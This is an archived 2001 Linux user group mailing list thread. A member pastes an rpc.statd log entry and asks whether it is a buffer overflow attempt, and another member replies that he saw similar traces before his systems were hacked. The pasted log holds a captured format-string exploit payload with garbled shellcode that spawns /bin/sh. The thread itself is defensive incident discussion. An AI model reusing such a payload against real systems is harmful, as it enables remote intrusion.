Complete.Org: Mailing Lists: Archives: discussion: May 2001:
[aclug-L] Re: Buffer overflow attempt?? 		Home

[aclug-L] Re: Buffer overflow attempt??

[Top] [All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index] [Thread Index]
To: <discussion@xxxxxxxxx>
Subject: [aclug-L] Re: Buffer overflow attempt??
From: "John Alexander" <johnalexander@xxxxxxxxxxx>
Date: Wed, 23 May 2001 12:36:09 -0500
Reply-to: discussion@xxxxxxxxx 
Now that I think about it, I think I was seeing something like this back in
March, before my systems got hacked. I just thought it was bad information,
or chewed up headers or something like that. As a matter of fact, looking
through my logs reveals a very similar pattern around the 22nd of April
(that's as far back as my logs go).
As a tangent to that, I'm seeing quite a few entries in my portsentry logs
about attempts to access port 111, which is the sunrpc port, which I think
is tied to portmapper. <dumbquestion> What is portmapper, and why would I
want it running? </dumbquestion>

ja

-----Original Message-----
From: discussion-bounce@xxxxxxxxx [mailto:discussion-bounce@xxxxxxxxx]On
Behalf Of Dale W Hodge
Sent: Tuesday, May 22, 2001 9:44 PM
To: Aclug Discussion
Subject: [aclug-L] Buffer overflow attempt??



I've seen the following in my log files. I'm wondering if it's an attempt at
a
buffer overflow. Has anyone else seen this?

May 22 17:15:05 linux /sbin/rpc.statd[351]: gethostbyname error for
÷ÿ¿÷ÿ¿÷ÿ¿÷ÿ¿÷ÿ¿÷ÿ¿÷ÿ¿÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10
x%n%
192x%n??????????????????????????????????????????????????????????????????????
????
????????????????????????????????????????????????????????????????????????????
????
????????????????????????????????????????????????????????????????????????????
????
????????????????????????????????????????????????????????????????????????????
????
????????????????????????????????????????????????????????????????????????????
????
????????????????????????????????????????????????????????????????????????????
????
????????????????????????????????????????????????????????????????????????????
????
????????????????????????????????????????????????????????????????????????????
????
????????????????????????????????????????????????????????????????????????????
????
??????????????????????????????????????????????????????????????????1Àë|Y?A?A
þÀ?
A?ÃþÀ?°fÍ?³?YÆA?ÆA?I?A?°fÍ?³°fÍ?³0À?A°fÍ??Î?Ã1É°?Í?þÁ°?Í?þÁ°?Í
?
May 22 17:15:05 linux Ç/binÇF/shA0À?F?v?V?N?ó°
Í?°Í?èÿÿÿ


--dwh

---
Dale W Hodge - dwh@xxxxxxxxxxxxxxxx
Secretary & Website Maintainer - info@xxxxxxxxx
Air Capital Linux User's Group  (ACLUG)
---


-- This is the discussion@xxxxxxxxx list.  To unsubscribe,
visit http://tmp2.complete.org/cgi-bin/listargate-aclug.cgi


-- This is the discussion@xxxxxxxxx list.  To unsubscribe,
visit http://tmp2.complete.org/cgi-bin/listargate-aclug.cgi
[Prev in Thread] Current Thread [Next in Thread]